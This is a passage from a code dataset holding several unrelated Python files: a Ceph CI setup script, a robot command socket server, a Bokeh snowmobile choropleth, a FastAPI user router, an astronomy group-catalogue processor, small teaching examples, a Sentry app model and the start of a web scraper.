cephci/prereq.py --cluster <FILE>\n (--build <BUILD>)\n (--subscription <SUBSCRIPTION>)\n (--registry <REGISTRY>)\n [--setup-ssh-keys <BOOL>]\n [--config <FILE>]\n [--log-level <LOG>]\n\n cephci/prereq.py --help\n\n Options:\n -h --help Help\n -c --cluster <FILE> Cluster config file\n -b --build <BUILD> Build type [rh|ibm]\n -s --subscription <CRED> Subscription manager server\n -r --registry <STR> Container registry server\n -k --setup-ssh-keys <BOOL> Setup SSH keys on cluster\n -f --config <FILE> CephCI configuration file\n -l --log-level <LOG> Log level for log utility\n\"\"\"\n\n\ndef _set_log(level):\n log.logger.setLevel(level.upper())\n\n\ndef _load_cluster_config(config):\n cluster_conf = None\n with open(config, \"rb\") as f:\n cluster_conf = pickle.load(f)\n\n for _, cluster in cluster_conf.items():\n [node.reconnect() for node in cluster]\n\n return cluster_conf\n\n\ndef setup_subscription_manager(node, server):\n # Get configuration details from cephci configs\n configs = get_subscription_credentials(server)\n configs[\"force\"] = True\n\n # Get timeout and interval\n timeout = configs.get(\"timeout\")\n retry = configs.get(\"retry\")\n interval = int(timeout / retry)\n\n # Remove timeout and try configs\n configs.pop(\"timeout\")\n configs.pop(\"retry\")\n\n # Subscribe to server\n for w in WaitUntil(timeout=timeout, interval=interval):\n try:\n sm(node).register(**configs)\n log.info(f\"Subscribed to '{server}' server successfully\")\n return True\n except SubscriptionManagerError:\n log.error(f\"Failed to subscribe to '{server}' server. Retrying\")\n\n # Check if node subscribe to subscription manager\n if w.expired:\n log.error(f\"Failed to subscribe to '{server}' server.\")\n\n log.info(f\"Logined to subscription manager '{server}' successfully\")\n return False\n\n\ndef subscription_manager_status(node):\n # Get subscription manager status\n status = sm(node).status()\n\n # Check for overall status\n expr = \".*Overall Status:(.*).*\"\n match = re.search(expr, status)\n if not match:\n msg = \"Unexpected subscription manager status\"\n log.error(msg)\n raise SubscriptionManagerError(msg)\n\n return match.group(0)\n\n\ndef setup_local_repos(node, distro):\n # Get repos from cephci config\n repos = get_repos(\"local\", distro)\n\n # Add local repositories\n for repo in repos:\n Package(node).add_repo(repo=repo)\n\n log.info(\"Added local RHEL repos successfully\")\n return True\n\n\ndef registry_login(node, server, build):\n # Get registry config from cephci config\n config = get_registry_credentials(server, build)\n\n # Login to container registry\n Registry(node).login(**config)\n\n log.info(f\"Logined to container registry '{server}' successfully\")\n return True\n\n\ndef enable_rhel_repos(node, server, distro):\n # Get RHEL repos from cephci config\n repos = get_repos(server, distro)\n\n # Enable RHEL repos\n sm(node).repos.enable(repos)\n\n log.info(f\"Enabled repos '{server}' for '{distro}'\")\n return True\n\n\ndef prereq(cluster, build, subscription, registry, ssh=False):\n nodes = cluster.get_nodes()\n packages = \" \".join(get_packages())\n for node in nodes:\n distro = f\"rhel-{os_major_version(node)}\"\n if subscription == \"skip\":\n enable_rhel_repos(node, \"local\", distro)\n\n elif subscription in [\"cdn\", \"stage\"]:\n setup_subscription_manager(node, subscription)\n\n status = subscription_manager_status(node)\n if status == \"Unknown\":\n msg = f\"Subscription manager is in '{status}' status\"\n log.error(msg)\n raise NodeConfigError(msg)\n\n enable_rhel_repos(node, subscription, distro)\n\n Package(node).install(packages)\n\n if registry != \"skip\":\n registry_login(node, registry, build)\n\n if ssh:\n installer = cluster.get_ceph_object(\"installer\")\n setup_ssh_keys(installer, nodes)\n\n\nif __name__ == \"__main__\":\n args = docopt(doc)\n\n cluster = args.get(\"--cluster\")\n build = args.get(\"--build\")\n subscription = args.get(\"--subscription\")\n registry = args.get(\"--registry\")\n setup_ssh = args.get(\"--setup-ssh-keys\")\n config = args.get(\"--config\")\n log_level = args.get(\"--log-level\")\n\n _set_log(log_level)\n get_configs(config)\n\n cluster_dict = _load_cluster_config(cluster)\n for cluster_name in cluster_dict:\n prereq(cluster_dict.get(cluster_name), build, subscription, registry, setup_ssh)\n","sub_path":"cephci/prereq.py","file_name":"prereq.py","file_ext":"py","file_size_in_byte":5477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"101600571","text":"import socket\n\ndef strToInt(string):\n if(len(string) == 0):\n# print('string length 0')\n return 0;\n x=0\n flag = 0\n if(string[0]=='-'):\n flag=1\n \n for i in range (0,len(string)):\n if string[i].isdigit():\n x+=int(string[i])*10**int(len(string)-i-1)\n# print('In strToInt',i,x)\n if (flag ==1):\n return (-1)*x\n else:\n return x\n\ndef create_socket():\n try:\n # Creating following 3 global variables\n global host\n global port\n global s # This is socket variable which is named s\n\n # Assigning values to these 3 global variables\n host = \"\"\n port = 9999\n s = socket.socket() # Creating a socket and assigning it to s\n\n except socket.error as msg:\n print(\"Socket creation error: \" + str(msg))\n\n\ndef bind_socket():\n try:\n # Declaring them again so that we can use the above global variable\n global host\n global port\n global s\n print(\"Binding the Port: \" + str(port))\n\n s.bind((host, port))\n s.listen(5)\n\n except socket.error as msg:\n print(\"Socket Binding error\" + str(msg) + \"\\n\" + \"Retrying...\")\n bind_socket()\n\ndef read_commands(conn):\n global mode,motorspeed1, motorspeed2, forward_left_motor, forward_right_motor, backward_left_motor, backward_right_motor;\n \n #IPCheckRoutine()\n while True:\n dataFromBase = str(conn.recv(1024))\n print(\"\\n Received Data = \"+dataFromBase)\n # print('lengthOfData', len(dataFromBase))\n if(len(dataFromBase) > 3):\n send_command(conn,'YES')\n index1 = dataFromBase.index(',')\n modeStr = dataFromBase[0:index1]\n \n mode = strToInt(modeStr)\n \n if(mode == 0):\n propulsion(dataFromBase,index1);\n elif(mode == 1):\n science(dataFromBase,index1);\n \n else:\n print(\"Not sending\",dataFromBase)\n send_command(conn,'NO')\n\ndef socket_accept():\n #s.accept retuens : conn: object of a conversation and address is a list of IP adress and a port\n conn, address = s.accept()\n print(\"Connection has been established! |\" + \" IP \" + address[0] + \" | Port\" + str(address[1]))\n read_commands(conn) #A function defined below to send command to client\n conn.close() #whenever the connection has been establised, at the end we want to close the connection\n\ndef propulsion(data1,data2):\n print(\"Propulsion\", data1,data2)\n\ndef science(dataFromBase,index1):\n global m1, m2, m3, m4, m5, m6, m7, m8;\n \n index2 = dataFromBase.index(',',index1+1)\n StrbaseMotorSpeed = dataFromBase[index1+1:index2]\n m1 = strToInt(StrbaseMotorSpeed);\n print(\"m1:\",m1)\n\n index3 = dataFromBase.index(',',index2+1)\n StrbaseMotorSpeed = dataFromBase[index2+1:index3]\n m2 = strToInt(StrbaseMotorSpeed);\n print(\"m2:\",m2)\n\n index4 = dataFromBase.index(',',index3+1)\n StrbaseMotorSpeed = dataFromBase[index3+1:index4]\n m3 = strToInt(StrbaseMotorSpeed);\n print(\"m3:\",m3)\n\n index5 = dataFromBase.index(',',index4+1)\n StrbaseMotorSpeed = dataFromBase[index4+1:index5]\n m4 = strToInt(StrbaseMotorSpeed);\n print(\"m4:\",m4)\n\n index6 = dataFromBase.index(',',index5+1)\n StrbaseMotorSpeed = dataFromBase[index5+1:index6]\n m5 = strToInt(StrbaseMotorSpeed);\n print(\"m5:\",m5)\n\n index7 = dataFromBase.index(',',index6+1)\n StrbaseMotorSpeed = dataFromBase[index6+1:index7]\n m6 = strToInt(StrbaseMotorSpeed);\n print(\"m6:\",m6)\n\n index8 = dataFromBase.index(',',index7+1)\n StrbaseMotorSpeed = dataFromBase[index7+1:index8]\n m7 = strToInt(StrbaseMotorSpeed);\n print(\"m7:\",m7)\n \n print(index8)\n #index9 = dataFromBase.index(',',index8+1)\n StrbaseMotorSpeed = dataFromBase[index8+1:]\n m8 = strToInt(StrbaseMotorSpeed);\n print(\"m8:\",m8)\n \n\ndef send_command(conn1,data1):\n conn1.send(str.encode(data1))\n\n\n\n\ncreate_socket()\nbind_socket()\nsocket_accept()\n","sub_path":"Python_Codes/kyd_code/testing/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"127808208","text":"\n\n# Dataviz project for plotting snowmobile registrations by county in Illinois using Bokeh\n# Zack Larsen 10/27/2018\n\n# Snowmobile data downloaded from:\n#https://data.illinois.gov/dataset/1fab1c10-5230-4e75-8c4c-96ae08a1bd56/resource/6c7c1f88-4748-4691-9df8-04a3067c5eab/download/hodnrtempboatssnowmastercurrentexcelfiles20181001snowactiveregistrations.xlsx\n\nimport pandas as pd\npd.set_option(\"display.max_rows\",100)\npd.set_option(\"display.max_columns\",20)\nimport os\n\nfrom bokeh.io import show\nfrom bokeh.models import LogColorMapper\nfrom bokeh.palettes import Viridis6 as palette\nfrom bokeh.plotting import figure\nfrom bokeh.sampledata.us_counties import data as counties\nfrom bokeh.plotting import figure, output_file, save\n\npalette.reverse()\n\n\n\nos.getcwd()\nos.chdir('/Users/zacklarsen/Desktop/Projects/Dataviz/Python')\nos.listdir()\n\nsnowmobiles = pd.read_excel('hodnrtempboatssnowmastercurrentexcelfiles20181001snowactiveregistrations.xlsx')\nsnowmobiles.head()\n\n# Get the snowmobile counts by counties in a dictionary:\ndf = snowmobiles.groupby('COUNTY').Registration_Number.nunique().reset_index(name='counts')\ncounty_snowmobiles = pd.Series(df['counts'].values,index=df['COUNTY']).to_dict()\n# county_snowmobiles\n# len(county_snowmobiles) # 91\n\n\n# Save shape longitude and latitude values for all Illinois counties:\ncounties = {\n code: county for code, county in counties.items() if county[\"state\"] == \"il\"\n}\n\n# counties\n\ncounty_names = [county['name'].upper() for county in counties.values()]\n# len(county_names) # 102\n# county_names\ncounty_xs = [county[\"lons\"] for county in counties.values()]\n# len(county_xs) # 102\n# county_xs\ncounty_ys = [county[\"lats\"] for county in counties.values()]\n# len(county_ys) # 102\n# county_ys\n\n\n\n# Get the counties that appear in the Bokeh county data for Illinois but not the\n# snowmobile spreadsheet from Illinois.gov:\n# for key in county_names:\n# if key not in county_snowmobiles.keys():\n# print(key)\n\n# Get the counties from the snowmobile spreadsheet that do not appear in the Bokeh\n# county data:\n# for key in county_snowmobiles.keys():\n# if key not in county_names:\n# print(key)\n\n# We need to rename the counties from the snowmobile spreadsheet that were\n# misspelled:\ncounty_snowmobiles['DE WITT'] = county_snowmobiles.pop('DEWITT')\ncounty_snowmobiles['GREENE'] = county_snowmobiles.pop('GREEENE')\ncounty_snowmobiles['JO DAVIESS'] = county_snowmobiles.pop('JODAVIS')\ncounty_snowmobiles['ROCK ISLAND'] = county_snowmobiles.pop('ROCKISLAND')\ncounty_snowmobiles['ST. CLAIR'] = county_snowmobiles.pop('STCLAIR')\n\n# Look at this again to see which counties are still missing from county_snowmobiles:\n# for key in county_names:\n# if key not in county_snowmobiles.keys():\n# print(key)\n\n# We need to fill in values of zero for any\n# counties in Illinois that don't have a snowmobile registered:\nfor key in county_names:\n if key not in county_snowmobiles.keys():\n county_snowmobiles[key] = 0\n\n# len(county_snowmobiles) # 108; there should be 102, so these 6 need to be removed:\nextras = []\nfor key in county_snowmobiles.keys():\n if key not in county_names:\n extras.append(key)\n# extras\n\nfor state in extras:\n del county_snowmobiles[state]\n\n# len(county_snowmobiles) # 102. Success!\n\n\n\n\n\n\n\n\n\n\n\n# county_snowmobiles\n# counties\n# counties.values()\n\n# Get the county name from counties\n# for county_id in counties.values():\n# print(county_id['name'])\n\n# [county_snowmobiles[county['name'].upper()] for county in counties.values()]\n\n# We need to have a county_id and corresponing rate so that we can have the\n# number of vehicles for each county county_vehicles) in the same order as the\n# counties themselves (from Bokeh data):\n\ncounty_vehicles = [county_snowmobiles[county['name'].upper()] for county in counties.values()]\n# county_vehicles # List of values\n\n# len(county_vehicles) # 102. Booyah!!\n\n\n\n\n\n\n\n\n\n\n# Constructing the plot:\n\ncolor_mapper = LogColorMapper(palette=palette)\n\ndata=dict(\n x=county_xs,\n y=county_ys,\n name=county_names,\n count=county_vehicles\n)\n\nTOOLS = \"pan,wheel_zoom,reset,hover,save\"\n\np = figure(\n title=\"Illinois snowmobile registrations\", tools=TOOLS,\n x_axis_location=None, y_axis_location=None,\n tooltips=[\n (\"Name\", \"@name\"), (\"Snowmobile count\", \"@count\"), (\"(Long, Lat)\", \"($x, $y)\")\n ])\n\np.grid.grid_line_color = None\n\np.hover.point_policy = \"follow_mouse\"\n\np.patches('x', 'y', source=data,\n fill_color={'field': 'count', 'transform': color_mapper},\n fill_alpha=0.7, line_color=\"white\", line_width=0.5)\n\n\nshow(p)\n\n\n\n\n# Save plot as HTML file:\nfrom bokeh.plotting import figure, output_file, save\noutput_file(\"Illinois snowmobiles.html\")\nsave(p)\n\n\n# Delete the plot when finished or rendering a second time:\ndel p\n\n\n\n\n\n\n\ndir()\nglobals()\nlocals()\n","sub_path":"src/Choropleth.py","file_name":"Choropleth.py","file_ext":"py","file_size_in_byte":4826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"316592748","text":"from fastapi import APIRouter, Depends, status, HTTPException\nfrom .. import schemas, models\nfrom ..hashing import Hash\nfrom ..database import get_db\nfrom sqlalchemy.orm import Session\n\n\nrouter = APIRouter(\n prefix='/users',\n tags=['Users'])\n\n\n@router.post('/', status_code=status.HTTP_201_CREATED, response_model=schemas.ShowUser, tags=['Users'])\ndef createUser(request: schemas.User, db: Session = Depends(get_db)):\n new_user = models.User(\n firstName=request.firstName,\n lastName=request.lastName,\n email=request.email,\n password=Hash.bcrypt(request.password)\n )\n db.add(new_user)\n db.commit()\n db.refresh(new_user)\n return new_user\n\n\n@router.get('/{id}', status_code=status.HTTP_200_OK, response_model=schemas.ShowUser, tags=['Users'])\ndef showUser(id: int, db: Session = Depends(get_db)):\n user = db.query(models.User).filter(models.User.id == id).first()\n if not user:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f'Could not find user with ID {id}')\n return user\n","sub_path":"challenge/routers/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"357335222","text":"#!/usr/bin/python\n\n#Author: Duncan Campbell\n#Written: July 9, 2013\n#Yale University\n#Description: Read in group finder mock runs and add information from the mock\n#group finder input must contain group ID and galaxy ID.\n\n###packages###\nfrom __future__ import print_function, division\nimport numpy as np\nimport h5py\nimport sys\nimport math\nfrom astropy.io import ascii\nfrom astropy import table\nfrom astropy import cosmology\nfrom scipy import interpolate\nimport custom_utilities as cu\n\ndef main():\n \n if len(sys.argv)<2: group_finder = 'yang' #berlind, tinker\n else: group_finder = sys.argv[1]\n if len(sys.argv)<3: catalogue = 'Mr19_age_distribution_matching_mock'\n else: catalogue = sys.argv[2]\n \n print('building a value added group catalogue for the {0} group finder and the {1}'.format(group_finder,catalogue))\n \n savepath = cu.get_output_path()+'processed_data/'+group_finder+'_groupcat/mock_runs/4th_run/custom_catalogues/'\n\n #############################################################################################\n savepath = cu.get_output_path()+'processed_data/'+group_finder+'_groupcat/mock_runs/4th_run/custom_catalogues/'\n #open mock group catalogue\n filepath = cu.get_output_path()+'processed_data/'+group_finder+'_groupcat/mock_runs/4th_run/'\n catalogue_name = catalogue+'_radec_mock'\n f = h5py.File(filepath+catalogue_name+'.hdf5', 'r')\n GC = f.get(catalogue_name)\n GC = np.array(GC)\n\n #open x,y,z mock\n filepath = cu.get_output_path()+'processed_data/hearin_mocks/custom_catalogues/'\n catalogue_name = catalogue\n f = h5py.File(filepath+catalogue_name+'.hdf5', 'r')\n mock = f.get(catalogue_name)\n mock = np.array(mock)\n\n #open the ra,dec mock\n filepath = cu.get_output_path()+'processed_data/hearin_mocks/custom_catalogues/'\n filename = catalogue+'_radec_mock.dat'\n mock_radec = ascii.read(filepath+filename, delimiter='\\s', Reader=ascii.Basic, data_start=1)\n mock_radec = np.array(mock_radec)\n #############################################################################################\n\n #define some constants\n c = 299792.458 #km/s\n cosmo = cosmology.FlatLambdaCDM(H0=100, Om0=0.27) #h=1\n Omega_m = cosmo.Om0\n print('using cosmology: ', cosmo)\n z_upper_lim = 0.068\n z_lower_lim = 0.020\n print('lower redshift: {0} upper redshift: {1}'.format(z_lower_lim,z_upper_lim))\n\n #create a new catalogue to store results\n dtype=[('ID','>i8'),('k_1','>i8'),('k_2','>i8'),('RA','>f8'),('DEC','>f8'),('Z','>f8'),('red','>i8'),\\\n ('M_u,0.1','>f8'),('M_g,0.1','>f8'),('M_r,0.1','>f8'),('M_i,0.1','>f8'),('M_z,0.1','>f8'),('MSTAR','>f8'),\\\n ('GROUP_ID','>i8'),('MGROUP','>f8'),('ZGROUP','>f8'),('R200','>f8'),\\\n ('CEN_IND','>i8'),('RANK','>i8'),('RPROJ','>f8'),('N_sat','>i8'),('N_sat_red','>i8'),('N_sat_blue','>i8'),\\\n ('HALO_M','>f8'),('HALO_RANK','>i8')]\n dtype = np.dtype(dtype)\n data = np.recarray((len(GC),), dtype=dtype)\n data.fill(-99.9) #empty value indicator\n\n data['GROUP_ID'] = GC['group_ID']\n\n #caclulate index into ra-dec mock file\n index = np.argsort(mock_radec['ID'])\n sorted_IDs = mock_radec['ID'][index]\n ind = np.searchsorted(sorted_IDs,GC['gal_ID'])\n ind = index[ind]\n \n #grab values from ra-dec mock\n data['k_1'] = ind\n data['ID'] = mock_radec['ID'][ind]\n data['RA'] = mock_radec['ra'][ind]\n data['DEC'] = mock_radec['dec'][ind]\n data['Z'] = mock_radec['z'][ind]\n \n #calculate index into xyz mock\n ind = mock_radec['k'][ind]\n #grab values from xyz mock\n data['k_2'] = ind\n data['M_g,0.1'] = mock['M_r,0.1'][ind]+mock['g-r'][ind]\n data['M_r,0.1'] = mock['M_r,0.1'][ind]\n #data['HALO_M'] = mock['M200b_host'][ind]\n data['HALO_M'] = mock['M_host'][ind]\n\n #determine cen/sat designation in xyz mock\n result = np.where(mock['ID_host'][ind]==-1)[0]\n data['HALO_RANK'][result] = 1 #central\n result = np.where(mock['ID_host'][ind]!=-1)[0]\n data['HALO_RANK'][result] = 0 #satellite\n\n #calculate galaxy colors\n color = data['M_g,0.1']-data['M_r,0.1']\n LHS = 0.7 - 0.032*(data['M_r,0.1']+16.5) #Weinmann 2006\n blue = np.where(color<LHS)[0] #indices of blue galaxies\n red = np.where(color>LHS)[0] #indicies of red galaxies\n \n #record color designation\n data['red'][red] = 1\n data['red'][blue] = 0\n\n for i in range(0,len(data)):\n group_id = data['GROUP_ID'][i]\n members = np.where(data['GROUP_ID']==group_id)[0]\n central = np.where(data['M_r,0.1'][members]==min(data['M_r,0.1'][members]))[0][0]\n central = members[central]\n satellites = np.where(members!=central)[0]\n satellites = members[satellites]\n #record rank\n data['RANK'][central] = 1\n data['RANK'][satellites] = 0\n #record number of satellites in the group\n data['N_sat'][members] = len(satellites)\n sat_red = np.where(np.in1d(satellites,red)==True)[0]\n data['N_sat_red'][members] = len(sat_red)\n sat_blue = np.where(np.in1d(satellites,blue)==True)[0]\n data['N_sat_blue'][members] = len(sat_blue)\n #record other group information\n data['CEN_IND'][members] = central\n data['ZGROUP'][members] = data['Z'][central]\n #calculate projected distance from central\n da = cu.spheredist(data['RA'][central],data['DEC'][central],data['RA'][members],data['DEC'][members])\n da = np.radians(da) #convert to radians\n chi = cosmo.comoving_distance(data['ZGROUP'][central]).value*1000.0 #in kpc\n data['RPROJ'][members]=chi/(1.0+data['ZGROUP'][members])*da #caclulate physical seperation\n data['RPROJ'][central]=0.0 #==0 if it is the central\n \n #remove galaxies from the sample which fall outside the volume\n keep = np.where((data['ZGROUP']<z_upper_lim) & (data['ZGROUP']>z_lower_lim))[0]\n data = data[keep]\n\n #run through the data again and fix indices after we removed some galaxies\n for i in range(0,len(data)):\n group_id = data['GROUP_ID'][i]\n members = np.where(data['GROUP_ID']==group_id)[0]\n central = np.where(data['M_r,0.1'][members]==min(data['M_r,0.1'][members]))[0][0]\n central = members[central]\n data['CEN_IND'][members] = central\n\n #read in mass halo function\n filepath = cu.get_base_path()+'fortran_code/mass_functions/'\n filename = 'Bolshoi_Massfunc.dat'\n names = ['dM','dn','nsum']\n dndM = ascii.read(filepath+filename, delimiter='\\s', names=names, data_start=0)\n dndM = np.array(dndM)\n\n #idenditify centrals and satellites\n centrals = np.where(data['RPROJ']==0)[0]\n satellites = np.where(data['RPROJ']>0)[0]\n\n #calculate group total r-band luminosities\n S_r = 4.64\n group_L = np.zeros((len(data),),dtype=np.float)\n\n for i in range(0,len(centrals)):\n gal = np.where(data['GROUP_ID']==data['GROUP_ID'][centrals[i]])[0]\n group_L[gal] = np.log10(np.sum(10.0**(solar_lum(data['M_r,0.1'][gal], S_r))))\n tot_lum = group_L[centrals]\n\n #calculate abundance matched masses for groups\n geo_f = 1.0/8.0 #gemoetric factor: spherical octant\n r_max = cosmo.comoving_distance(z_upper_lim).value #in Mpc\n r_min = cosmo.comoving_distance(z_lower_lim).value #in Mpc\n mock_volume = (4.0/3.0)*math.pi*(r_max**3.0-r_min**3.0)*geo_f\n\n #caclulate the group luminosity function\n N_gal = np.cumsum(np.zeros(len(centrals))+1) #cumulative number of groups\n n_gal = N_gal/mock_volume #number density\n L_gal = np.sort(tot_lum)[::-1] #group luminosity\n ind = np.argsort(tot_lum)[::-1]\n\n #integrate halo mass function\n n_halo = dndM['nsum'][::-1] #cumulative number density\n M_halo = dndM['dM'][::-1] #halo mass\n\n #interpolate the halo mass function\n x = np.log10(n_halo)\n y = M_halo\n f = interpolate.interp1d(x, y, kind='linear', bounds_error='False', fill_value=0.0)\n\n data['MGROUP'][centrals[ind]] = f(np.log10(n_gal))\n\n for i in range(0,len(centrals)):\n gal = np.where(data['GROUP_ID']==data['GROUP_ID'][centrals[i]])[0]\n data['MGROUP'][gal] = data['MGROUP'][centrals[i]]\n\n R_200 = 258.1 * (10.0**data['MGROUP']/(10.0**12.0))**(1.0/3.0)*(Omega_m/0.25)**(1.0/3.0)*(1.0+data['ZGROUP'])**(-1.0) \n data['R200'] = R_200\n \n print('saving hdf5 version of the catalogue...')\n filename = catalogue+'_groups'\n print(savepath+filename+'.dat')\n f = h5py.File(savepath+filename+'.hdf5', 'w')\n dset = f.create_dataset(filename, data=data)\n f.close()\n\n print('saving ascii version of the catalogue...')\n print(savepath+filename+'.dat')\n data_table = table.table.Table(data=data)\n ascii.write(data_table, savepath+filename+'.dat')\n\ndef solar_lum(M,Msol):\n L = ((Msol-M)/2.5)\n return L \n\nif __name__ == '__main__':\n main()\n","sub_path":"mock_groups/process_mockruns.py","file_name":"process_mockruns.py","file_ext":"py","file_size_in_byte":8868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"16030928","text":"\n\ndef another_example():\n try:\n x=int(input(\"Enter a number and I will return double that value... \"))\n print(x*2)\n except ValueError:\n print(\"Value entered has to be an integer\" )\n\ndef main():\n try:\n ReadFile=open(\"sample.txt\", \"r\")\n for line in ReadFile:\n print(line)\n ReadFile.close()\n except IOError:\n print(\"File not found\")\n\n\nif __name__ == \"__main__\":\n main()\n another_example()\n print(\"App is done\")\n ","sub_path":"udemy_python_course/section8/try_catch.py","file_name":"try_catch.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"450079147","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\n\r\ndef time_measurement(func):\r\n\r\n def wrapper(*args, **kwargs):\r\n import time\r\n start = time.time()\r\n result = func(*args, **kwargs)\r\n end = time.time()\r\n print('{}: {:.0f}ms'.format(func.__name__, (end - start) * 1000))\r\n return result\r\n\r\n return wrapper\r\n\r\n\r\nclass LSystem(object):\r\n\r\n def __init__(self, axiom=None, rules=None):\r\n self.set_axiom(axiom)\r\n self.set_rules(rules)\r\n\r\n def set_axiom(self, axiom):\r\n self.cache = {}\r\n self.axiom = axiom\r\n\r\n def set_rules(self, rules):\r\n self.cache = {}\r\n try:\r\n import re\r\n self.rules = dict([r.split('=') for r in rules])\r\n self.rx = re.compile('|'.join(map(re.escape, self.rules)))\r\n except ValueError:\r\n self.rules = None\r\n\r\n def _replace(self, text):\r\n return self.rx.sub(lambda m: self.rules[m.group()], text)\r\n\r\n @time_measurement\r\n def generate(self, n=1):\r\n if n in self.cache:\r\n return self.cache[n]\r\n text = self.axiom\r\n for i in range(n):\r\n text = self._replace(text)\r\n self.cache[n] = text\r\n return text\r\n\r\n\r\nif __name__ == '__main__':\r\n import turtle\r\n\r\n lsystem = LSystem(axiom='F++F++F', rules=['F=F-F++F-F'])\r\n\r\n turtle.speed(0)\r\n output = lsystem.generate(10)\r\n output = lsystem.generate(10)\r\n output = lsystem.generate(10)\r\n for s in output:\r\n if s == 'F':\r\n turtle.fd(1)\r\n elif s == '+':\r\n turtle.rt(60)\r\n elif s == '-':\r\n turtle.lt(60)\r\n","sub_path":"python/lsystem/lsystem.py","file_name":"lsystem.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"488224034","text":"from __future__ import absolute_import\n\nimport six\nimport uuid\nimport hmac\nimport itertools\n\nfrom django.db import models\nfrom django.db.models import Q\nfrom django.utils import timezone\nfrom django.template.defaultfilters import slugify\nfrom hashlib import sha256\n\nfrom sentry.constants import SentryAppStatus, SENTRY_APP_SLUG_MAX_LENGTH\nfrom sentry.models import Organization\nfrom sentry.models.apiscopes import HasApiScopes\nfrom sentry.db.models import (\n ArrayField,\n BoundedPositiveIntegerField,\n FlexibleForeignKey,\n ParanoidModel,\n)\n\n# When a developer selects to receive \"<Resource> Webhooks\" it really means\n# listening to a list of specific events. This is a mapping of what those\n# specific events are for each resource.\nEVENT_EXPANSION = {\n 'issue': ['issue.created', 'issue.resolved'],\n}\n\n# We present Webhook Subscriptions per-resource (Issue, Project, etc.), not\n# per-event-type (issue.created, project.deleted, etc.). These are valid\n# resources a Sentry App may subscribe to.\nVALID_EVENT_RESOURCES = (\n 'issue',\n)\n\nREQUIRED_EVENT_PERMISSIONS = {\n 'issue': 'event:read',\n 'project': 'project:read',\n 'member': 'member:read',\n 'organization': 'org:read',\n 'team': 'team:read',\n}\n\n# The only events valid for Sentry Apps are the ones listed in the values of\n# EVENT_EXPANSION above. This list is likely a subset of all valid ServiceHook\n# events.\nVALID_EVENTS = tuple(itertools.chain(\n *EVENT_EXPANSION.values()\n))\n\n\ndef default_uuid():\n return six.binary_type(uuid.uuid4())\n\n\nclass SentryApp(ParanoidModel, HasApiScopes):\n __core__ = True\n\n application = models.OneToOneField(\n 'sentry.ApiApplication',\n null=True,\n on_delete=models.SET_NULL,\n related_name='sentry_app',\n )\n\n # Much of the OAuth system in place currently depends on a User existing.\n # This \"proxy user\" represents the SentryApp in those cases.\n proxy_user = models.OneToOneField(\n 'sentry.User',\n null=True,\n on_delete=models.SET_NULL,\n related_name='sentry_app'\n )\n\n # The Organization the Sentry App was created in \"owns\" it. Members of that\n # Org have differing access, dependent on their role within the Org.\n owner = FlexibleForeignKey('sentry.Organization',\n related_name='owned_sentry_apps')\n\n name = models.TextField()\n slug = models.CharField(max_length=SENTRY_APP_SLUG_MAX_LENGTH, unique=True)\n status = BoundedPositiveIntegerField(\n default=SentryAppStatus.UNPUBLISHED,\n choices=SentryAppStatus.as_choices(),\n db_index=True,\n )\n uuid = models.CharField(max_length=64,\n default=default_uuid)\n\n redirect_url = models.URLField(null=True)\n webhook_url = models.URLField()\n # does the application subscribe to `event.alert`,\n # meaning can it be used in alert rules as a {service} ?\n is_alertable = models.BooleanField(default=False)\n\n events = ArrayField(null=True)\n\n overview = models.TextField(null=True)\n\n date_added = models.DateTimeField(default=timezone.now)\n date_updated = models.DateTimeField(default=timezone.now)\n\n class Meta:\n app_label = 'sentry'\n db_table = 'sentry_sentryapp'\n\n @classmethod\n def visible_for_user(cls, user):\n if user.is_superuser:\n return cls.objects.all()\n\n return cls.objects.filter(\n Q(status=SentryAppStatus.PUBLISHED) | Q(owner__in=user.get_orgs()),\n )\n\n @property\n def organizations(self):\n if not self.pk:\n return Organization.objects.none()\n\n return Organization \\\n .objects \\\n .select_related('sentry_app_installations') \\\n .filter(sentry_app_installations__sentry_app_id=self.id)\n\n @property\n def teams(self):\n from sentry.models import Team\n\n if not self.pk:\n return Team.objects.none()\n\n return Team.objects.filter(organization__in=self.organizations)\n\n @property\n def is_published(self):\n return self.status == SentryAppStatus.PUBLISHED\n\n def save(self, *args, **kwargs):\n self._set_slug()\n return super(SentryApp, self).save(*args, **kwargs)\n\n def is_installed_on(self, organization):\n return self.organizations.filter(pk=organization.pk).exists()\n\n def _set_slug(self):\n \"\"\"\n Matches ``name``, but in lowercase, dash form.\n\n >>> self._set_slug('My Cool App')\n >>> self.slug\n my-cool-app\n \"\"\"\n if not self.slug:\n self.slug = slugify(self.name)\n\n def build_signature(self, body):\n secret = self.application.client_secret\n return hmac.new(\n key=secret.encode('utf-8'),\n msg=body.encode('utf-8'),\n digestmod=sha256,\n ).hexdigest()\n","sub_path":"src/sentry/models/sentryapp.py","file_name":"sentryapp.py","file_ext":"py","file_size_in_byte":4839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"373231851","text":"import re\r\nfrom urllib.parse import urlparse\r\nfrom lxml import html, etree\r\nimport requests\r\nfrom utils.download import download\r\nfrom bs4 import BeautifulSoup\r\n\r\nmaster_lst = [] # contains list of every valid URL that is passed to the frontier\r\ncount_unique_url = 0 # tracks the number of total unique URLs\r\nlongest_page = \"\" # stores the URL of the longest page\r\nnum_words_longest_page = 0 # tracks number of tokens on the longest url\r\nmaster_freq_dict = {} # stores all the tokens and tracks their frequency of appearance across all pages\r\nmaster_subdomain_dict = {} # stores the subdomains of ics.uci.edu and the frequency of each\r\n\r\n\r\ndef scraper(url, 